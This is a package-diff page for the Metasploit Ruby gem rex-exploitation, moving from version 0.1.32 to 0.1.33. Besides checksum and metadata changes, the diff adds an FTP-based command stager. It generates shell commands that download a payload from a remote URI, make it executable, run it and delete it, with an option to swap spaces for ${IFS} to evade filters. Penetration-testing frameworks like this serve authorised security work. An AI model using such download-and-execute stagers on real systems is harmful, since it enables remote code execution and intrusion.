rex-exploitation 0.1.32 → 0.1.33

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: ea51688315db43ddb2a980d72a715dbe8f7eaf59613df153392b2bcb10735eb0
4
- data.tar.gz: d2278d504b70b8db76031c45669a87ae25377c595e318efae605732beaaf79a6
3
+ metadata.gz: 4567513652f9feb000ed35325302b3ae1401ccd716dc2f239804d3b18d873d3c
4
+ data.tar.gz: '095d0d2685bf3fde588e4fd2d366df900a1e3950fe810c9d6adae2b9d1ca7b8d'
5
5
  SHA512:
6
- metadata.gz: c3dcf1ca77715c531385068d818183d3a130551a9505fb281be4cc26a3d24b9166235acce86474370195eec466b1a416fe83b0286fd787bd393956317733d827
7
- data.tar.gz: f7c73e02aca2da10019466617de38c0ca728c592a0420faaee0972911364be5c00673b694f1ad2510728aa94aa72230ef9cdf8311716c4528dbf6a2ebe3b7172
6
+ metadata.gz: 897d556a93ddf347c0a42cc2c581b9daf3b52bdc76775a66c7bad6a26de96d49f2555c01d69becac1456528cdd6d645942db557096ea70c7ad142f51f5d01cef
7
+ data.tar.gz: 6400490f470c42b81d26d7d6e4ce0ef3bee7baf27a331d7408d813a3eb6fc8f0ee8529ead6b531f4c82b52bb814a409fb7495170a1ed98227310f1933b7d8826
checksums.yaml.gz.sig CHANGED
Binary file
@@ -0,0 +1,49 @@
1
+ # -*- coding: binary -*-
2
+
3
+ class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
4
+
5
+ def http?
6
+ true
7
+ end
8
+
9
+ def user_agent
10
+ /ftp/i
11
+ end
12
+
13
+ def generate(opts = {})
14
+ if opts[:payload_uri].nil?
15
+ raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
16
+ end
17
+
18
+ opts[:temp] ||= '/tmp'
19
+ opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
+
22
+ super
23
+ end
24
+
25
+ def generate_cmds_payload(opts)
26
+ # -o: output file name (argument must be before URL)
27
+ ["ftp -o #{@payload_path} #{opts[:payload_uri]}"]
28
+ end
29
+
30
+ def generate_cmds_decoder(opts)
31
+ cmds = []
32
+
33
+ cmds << "chmod +x #{@payload_path}"
34
+ cmds << @payload_path
35
+ cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
36
+
37
+ cmds
38
+ end
39
+
40
+ def compress_commands(cmds, opts)
41
+ cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
42
+ super
43
+ end
44
+
45
+ def cmd_concat_operator
46
+ ';'
47
+ end
48
+
49
+ end
@@ -14,3 +14,4 @@ require 'rex/exploitation/cmdstager/curl'
14
14
  require 'rex/exploitation/cmdstager/fetch'
15
15
  require 'rex/exploitation/cmdstager/lwprequest'
16
16
  require 'rex/exploitation/cmdstager/psh_invokewebrequest'
17
+ require 'rex/exploitation/cmdstager/ftp_http'
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.32"
3
+ VERSION = "0.1.33"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-exploitation
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.32
4
+ version: 0.1.33
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2022-07-11 00:00:00.000000000 Z
96
+ date: 2022-07-14 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
@@ -263,6 +263,7 @@ files:
263
263
  - lib/rex/exploitation/cmdstager/debug_write.rb
264
264
  - lib/rex/exploitation/cmdstager/echo.rb
265
265
  - lib/rex/exploitation/cmdstager/fetch.rb
266
+ - lib/rex/exploitation/cmdstager/ftp_http.rb
266
267
  - lib/rex/exploitation/cmdstager/lwprequest.rb
267
268
  - lib/rex/exploitation/cmdstager/printf.rb
268
269
  - lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb
metadata.gz.sig CHANGED
Binary file